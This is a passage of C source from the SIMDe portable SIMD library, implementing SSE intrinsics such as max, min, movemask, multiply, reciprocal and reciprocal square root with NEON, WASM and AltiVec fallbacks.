vld1q_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_load(mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE) && defined(__PPC64__)
r_.altivec_f32 = vec_vsx_ld(0, mem_addr);
#else
simde_memcpy(&r_, mem_addr, sizeof(r_));
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_loadu_ps(mem_addr) simde_mm_loadu_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_maskmove_si64(simde__m64 a, simde__m64 mask, int8_t *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
_mm_maskmove_si64(a, mask, HEDLEY_REINTERPRET_CAST(char *, mem_addr));
#else
simde__m64_private a_ = simde__m64_to_private(a),
mask_ = simde__m64_to_private(mask);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(a_.i8) / sizeof(a_.i8[0])); i++)
if (mask_.i8[i] < 0)
mem_addr[i] = a_.i8[i];
#endif
}
#define simde_m_maskmovq(a, mask, mem_addr) \
simde_mm_maskmove_si64(a, mask, mem_addr)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_maskmove_si64(a, mask, mem_addr) \
simde_mm_maskmove_si64( \
(a), (mask), \
SIMDE_CHECKED_REINTERPRET_CAST(int8_t *, char *, (mem_addr)))
#define _m_maskmovq(a, mask, mem_addr) \
simde_mm_maskmove_si64( \
(a), (mask), \
SIMDE_CHECKED_REINTERPRET_CAST(int8_t *, char *, (mem_addr)))
#endif
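/* Usage sketch (illustrative only): bytes are stored only where the
 * corresponding mask byte has its high bit set, leaving the rest of the
 * destination untouched -- a small predicated scatter:
 *
 *     int8_t buf[8] = { 0 };
 *     // write only the two lowest bytes of a
 *     simde_mm_maskmove_si64(
 *             a, simde_mm_set_pi8(0, 0, 0, 0, 0, 0, -1, -1), buf);
 */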
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_max_pi16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_max_pi16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i16 = vmax_s16(a_.neon_i16, b_.neon_i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = (a_.i16[i] > b_.i16[i]) ? a_.i16[i] : b_.i16[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmaxsw(a, b) simde_mm_max_pi16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_pi16(a, b) simde_mm_max_pi16(a, b)
#define _m_pmaxsw(a, b) simde_mm_max_pi16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_max_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_max_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_NANS)
r_.neon_f32 = vmaxq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vbslq_f32(vcgtq_f32(a_.neon_f32, b_.neon_f32),
a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE) && defined(SIMDE_FAST_NANS)
r_.wasm_v128 = wasm_f32x4_max(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 =
wasm_v128_bitselect(a_.wasm_v128, b_.wasm_v128,
wasm_f32x4_gt(a_.wasm_v128, b_.wasm_v128));
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) && defined(SIMDE_FAST_NANS)
r_.altivec_f32 = vec_max(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_sel(b_.altivec_f32, a_.altivec_f32,
vec_cmpgt(a_.altivec_f32, b_.altivec_f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (a_.f32[i] > b_.f32[i]) ? a_.f32[i] : b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_ps(a, b) simde_mm_max_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_max_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_max_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vmax_u8(a_.neon_u8, b_.neon_u8);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] > b_.u8[i]) ? a_.u8[i] : b_.u8[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmaxub(a, b) simde_mm_max_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_pu8(a, b) simde_mm_max_pu8(a, b)
#define _m_pmaxub(a, b) simde_mm_max_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_max_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_max_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_max_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
	float32_t value = vgetq_lane_f32(vmaxq_f32(a_.neon_f32, b_.neon_f32), 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = (a_.f32[0] > b_.f32[0]) ? a_.f32[0] : b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_max_ss(a, b) simde_mm_max_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_min_pi16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_min_pi16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i16 = vmin_s16(a_.neon_i16, b_.neon_i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = (a_.i16[i] < b_.i16[i]) ? a_.i16[i] : b_.i16[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pminsw(a, b) simde_mm_min_pi16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_pi16(a, b) simde_mm_min_pi16(a, b)
#define _m_pminsw(a, b) simde_mm_min_pi16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_min_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_min_ps(a, b);
#elif defined(SIMDE_FAST_NANS) && defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return simde__m128_from_neon_f32(vminq_f32(simde__m128_to_neon_f32(a),
simde__m128_to_neon_f32(b)));
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_FAST_NANS)
r_.wasm_v128 = wasm_f32x4_min(a_.wasm_v128, b_.wasm_v128);
#else
r_.wasm_v128 =
wasm_v128_bitselect(a_.wasm_v128, b_.wasm_v128,
wasm_f32x4_lt(a_.wasm_v128, b_.wasm_v128));
#endif
return simde__m128_from_private(r_);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_FAST_NANS)
r_.altivec_f32 = vec_min(a_.altivec_f32, b_.altivec_f32);
#else
r_.altivec_f32 = vec_sel(b_.altivec_f32, a_.altivec_f32,
vec_cmpgt(b_.altivec_f32, a_.altivec_f32));
#endif
return simde__m128_from_private(r_);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
simde__m128 mask = simde_mm_cmplt_ps(a, b);
return simde_mm_or_ps(simde_mm_and_ps(mask, a),
simde_mm_andnot_ps(mask, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (a_.f32[i] < b_.f32[i]) ? a_.f32[i] : b_.f32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_ps(a, b) simde_mm_min_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_min_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_min_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vmin_u8(a_.neon_u8, b_.neon_u8);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] < b_.u8[i]) ? a_.u8[i] : b_.u8[i];
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pminub(a, b) simde_mm_min_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_pu8(a, b) simde_mm_min_pu8(a, b)
#define _m_pminub(a, b) simde_mm_min_pu8(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_min_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_min_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_min_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value =
vgetq_lane_f32(vminq_f32(a_.neon_f32, b_.neon_f32), 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = (a_.f32[0] < b_.f32[0]) ? a_.f32[0] : b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_min_ss(a, b) simde_mm_min_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_movehl_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_movehl_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a32 = vget_high_f32(a_.neon_f32);
float32x2_t b32 = vget_high_f32(b_.neon_f32);
r_.neon_f32 = vcombine_f32(b32, a32);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_mergel(b_.altivec_i64, a_.altivec_i64));
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 6, 7, 2, 3);
#else
r_.f32[0] = b_.f32[2];
r_.f32[1] = b_.f32[3];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movehl_ps(a, b) simde_mm_movehl_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_movelh_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_movelh_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x2_t a10 = vget_low_f32(a_.neon_f32);
float32x2_t b10 = vget_low_f32(b_.neon_f32);
r_.neon_f32 = vcombine_f32(a10, b10);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 0, 1, 4, 5);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_mergeh(a_.altivec_i64, b_.altivec_i64));
#else
r_.f32[0] = a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = b_.f32[0];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movelh_ps(a, b) simde_mm_movelh_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_movemask_pi8(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_movemask_pi8(a);
#else
simde__m64_private a_ = simde__m64_to_private(a);
int r = 0;
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
uint8x8_t input = a_.neon_u8;
const int8_t xr[8] = {-7, -6, -5, -4, -3, -2, -1, 0};
const uint8x8_t mask_and = vdup_n_u8(0x80);
const int8x8_t mask_shift = vld1_s8(xr);
const uint8x8_t mask_result =
vshl_u8(vand_u8(input, mask_and), mask_shift);
uint8x8_t lo = mask_result;
r = vaddv_u8(lo);
#else
const size_t nmemb = sizeof(a_.i8) / sizeof(a_.i8[0]);
SIMDE_VECTORIZE_REDUCTION(| : r)
for (size_t i = 0; i < nmemb; i++) {
r |= (a_.u8[nmemb - 1 - i] >> 7) << (nmemb - 1 - i);
}
#endif
return r;
#endif
}
#define simde_m_pmovmskb(a) simde_mm_movemask_pi8(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movemask_pi8(a) simde_mm_movemask_pi8(a)
#define _m_pmovmskb(a) simde_mm_movemask_pi8(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
int simde_mm_movemask_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_movemask_ps(a);
#else
int r = 0;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
static const int32_t shift_amount[] = {0, 1, 2, 3};
const int32x4_t shift = vld1q_s32(shift_amount);
uint32x4_t tmp = vshrq_n_u32(a_.neon_u32, 31);
return HEDLEY_STATIC_CAST(int, vaddvq_u32(vshlq_u32(tmp, shift)));
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
// Shift out everything but the sign bits with a 32-bit unsigned shift right.
uint64x2_t high_bits =
vreinterpretq_u64_u32(vshrq_n_u32(a_.neon_u32, 31));
// Merge the two pairs together with a 64-bit unsigned shift right + add.
uint8x16_t paired =
vreinterpretq_u8_u64(vsraq_n_u64(high_bits, high_bits, 31));
// Extract the result.
return vgetq_lane_u8(paired, 0) | (vgetq_lane_u8(paired, 8) << 2);
#else
SIMDE_VECTORIZE_REDUCTION(| : r)
for (size_t i = 0; i < sizeof(a_.u32) / sizeof(a_.u32[0]); i++) {
r |= (a_.u32[i] >> ((sizeof(a_.u32[i]) * CHAR_BIT) - 1)) << i;
}
#endif
return r;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_movemask_ps(a) simde_mm_movemask_ps((a))
#endif
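/* Usage sketch (illustrative only): the four sign bits land in bits 0-3
 * of the result, so a whole-vector sign test is a single branch:
 *
 *     if (simde_mm_movemask_ps(v) != 0) {
 *         // at least one lane has its sign bit set (negative values,
 *         // -0.0f, or NaNs with the sign bit set)
 *     }
 */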
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_mul_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_mul_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vmulq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_mul(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 * b_.f32;
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_mul(a_.altivec_f32, b_.altivec_f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] * b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mul_ps(a, b) simde_mm_mul_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_mul_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_mul_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_mul_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.f32[0] = a_.f32[0] * b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mul_ss(a, b) simde_mm_mul_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_mulhi_pu16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_mulhi_pu16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
const uint32x4_t t1 = vmull_u16(a_.neon_u16, b_.neon_u16);
const uint32x4_t t2 = vshrq_n_u32(t1, 16);
const uint16x4_t t3 = vmovn_u32(t2);
r_.neon_u16 = t3;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u16) / sizeof(r_.u16[0])); i++) {
r_.u16[i] = HEDLEY_STATIC_CAST(
uint16_t, ((HEDLEY_STATIC_CAST(uint32_t, a_.u16[i]) *
HEDLEY_STATIC_CAST(uint32_t, b_.u16[i])) >>
UINT32_C(16)));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pmulhuw(a, b) simde_mm_mulhi_pu16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_mulhi_pu16(a, b) simde_mm_mulhi_pu16(a, b)
#define _m_pmulhuw(a, b) simde_mm_mulhi_pu16(a, b)
#endif
#if defined(SIMDE_X86_SSE_NATIVE) && defined(HEDLEY_GCC_VERSION)
#define SIMDE_MM_HINT_NTA HEDLEY_STATIC_CAST(enum _mm_hint, 0)
#define SIMDE_MM_HINT_T0 HEDLEY_STATIC_CAST(enum _mm_hint, 1)
#define SIMDE_MM_HINT_T1 HEDLEY_STATIC_CAST(enum _mm_hint, 2)
#define SIMDE_MM_HINT_T2 HEDLEY_STATIC_CAST(enum _mm_hint, 3)
#define SIMDE_MM_HINT_ENTA HEDLEY_STATIC_CAST(enum _mm_hint, 4)
#define SIMDE_MM_HINT_ET0 HEDLEY_STATIC_CAST(enum _mm_hint, 5)
#define SIMDE_MM_HINT_ET1 HEDLEY_STATIC_CAST(enum _mm_hint, 6)
#define SIMDE_MM_HINT_ET2 HEDLEY_STATIC_CAST(enum _mm_hint, 7)
#else
#define SIMDE_MM_HINT_NTA 0
#define SIMDE_MM_HINT_T0 1
#define SIMDE_MM_HINT_T1 2
#define SIMDE_MM_HINT_T2 3
#define SIMDE_MM_HINT_ENTA 4
#define SIMDE_MM_HINT_ET0 5
#define SIMDE_MM_HINT_ET1 6
#define SIMDE_MM_HINT_ET2 7
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
HEDLEY_DIAGNOSTIC_PUSH
#if HEDLEY_HAS_WARNING("-Wreserved-id-macro")
_Pragma("clang diagnostic ignored \"-Wreserved-id-macro\"")
#endif
#undef _MM_HINT_NTA
#define _MM_HINT_NTA SIMDE_MM_HINT_NTA
#undef _MM_HINT_T0
#define _MM_HINT_T0 SIMDE_MM_HINT_T0
#undef _MM_HINT_T1
#define _MM_HINT_T1 SIMDE_MM_HINT_T1
#undef _MM_HINT_T2
#define _MM_HINT_T2 SIMDE_MM_HINT_T2
#undef _MM_HINT_ENTA
#define _MM_HINT_ENTA SIMDE_MM_HINT_ENTA
#undef _MM_HINT_ET0
#define _MM_HINT_ET0 SIMDE_MM_HINT_ET0
#undef _MM_HINT_ET1
#define _MM_HINT_ET1 SIMDE_MM_HINT_ET1
#undef _MM_HINT_ET2
#define _MM_HINT_ET2 SIMDE_MM_HINT_ET2
HEDLEY_DIAGNOSTIC_POP
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_prefetch(char const *p, int i)
{
#if defined(HEDLEY_GCC_VERSION)
__builtin_prefetch(p);
#else
(void)p;
#endif
(void)i;
}
#if defined(SIMDE_X86_SSE_NATIVE)
#if defined(__clang__) && \
!SIMDE_DETECT_CLANG_VERSION_CHECK( \
10, 0, 0) /* https://reviews.llvm.org/D71718 */
#define simde_mm_prefetch(p, i) \
(__extension__({ \
HEDLEY_DIAGNOSTIC_PUSH \
HEDLEY_DIAGNOSTIC_DISABLE_CAST_QUAL \
_mm_prefetch((p), (i)); \
HEDLEY_DIAGNOSTIC_POP \
}))
#else
#define simde_mm_prefetch(p, i) _mm_prefetch(p, i)
#endif
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_prefetch(p, i) simde_mm_prefetch(p, i)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_negate_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return simde_mm_xor_ps(a, _mm_set1_ps(SIMDE_FLOAT32_C(-0.0)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_POWER_ALTIVEC_P8_NATIVE) && \
(!defined(HEDLEY_GCC_VERSION) || HEDLEY_GCC_VERSION_CHECK(8, 1, 0))
r_.altivec_f32 = vec_neg(a_.altivec_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vnegq_f32(a_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_neg(a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = vec_neg(a_.altivec_f32);
#elif defined(SIMDE_VECTOR_NEGATE)
r_.f32 = -a_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = -a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rcp_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rcp_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t recip = vrecpeq_f32(a_.neon_f32);
#if SIMDE_ACCURACY_PREFERENCE > 0
for (int i = 0; i < SIMDE_ACCURACY_PREFERENCE; ++i) {
recip = vmulq_f32(recip, vrecpsq_f32(recip, a_.neon_f32));
}
#endif
r_.neon_f32 = recip;
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_div(simde_mm_set1_ps(1.0f), a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_re(a_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR)
r_.f32 = 1.0f / a_.f32;
#elif defined(SIMDE_IEEE754_STORAGE)
/* https://stackoverflow.com/questions/12227126/division-as-multiply-and-lut-fast-float-division-reciprocal/12228234#12228234 */
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
int32_t ix;
simde_float32 fx = a_.f32[i];
simde_memcpy(&ix, &fx, sizeof(ix));
int32_t x = INT32_C(0x7EF311C3) - ix;
simde_float32 temp;
simde_memcpy(&temp, &x, sizeof(temp));
r_.f32[i] = temp * (SIMDE_FLOAT32_C(2.0) - temp * fx);
}
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = 1.0f / a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rcp_ps(a) simde_mm_rcp_ps((a))
#endif
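/* Accuracy sketch (illustrative only): rcp is an approximation (the SSE
 * hardware version is only good to roughly 12 bits), and one
 * Newton-Raphson step r = r * (2 - a*r) about doubles the accurate bits,
 * mirroring what the NEON path above does with vrecpsq_f32:
 *
 *     simde__m128 r = simde_mm_rcp_ps(a);
 *     r = simde_mm_mul_ps(r, simde_mm_sub_ps(simde_mm_set1_ps(2.0f),
 *                                            simde_mm_mul_ps(a, r)));
 */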
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rcp_ss(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rcp_ss(a);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_rcp_ps(a));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
r_.f32[0] = 1.0f / a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_rcp_ss(a) simde_mm_rcp_ss((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_rsqrt_ps(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_rsqrt_ps(a);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vrsqrteq_f32(a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_rsqrte(a_.altivec_f32);
#elif defined(SIMDE_IEEE754_STORAGE)
/* https://basesandframes.files.wordpress.com/2020/04/even_faster_math_functions_green_2020.pdf
Pages 100 - 103 */
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
#if SIMDE_ACCURACY_PREFERENCE <= 0
r_.i32[i] = INT32_C(0x5F37624F) - (a_.i32[i] >> 1);
#else
simde_float32 x = a_.f32[i];
simde_float32 xhalf = SIMDE_FLOAT32_C(0.5) * x;
int32_t ix;
simde_memcpy(&ix, &x, sizeof(ix));
#if SIMDE_ACCURACY_PREFERENCE == 1
ix = INT32_C(0x5F375A82) - (ix >> 1);
#else
ix = INT32_C(0x5F37599E) - (ix >> 1);
#endif
simde_memcpy(&x, &ix, sizeof(x));
#if SIMDE_ACCURACY_PREFERENCE >= 2
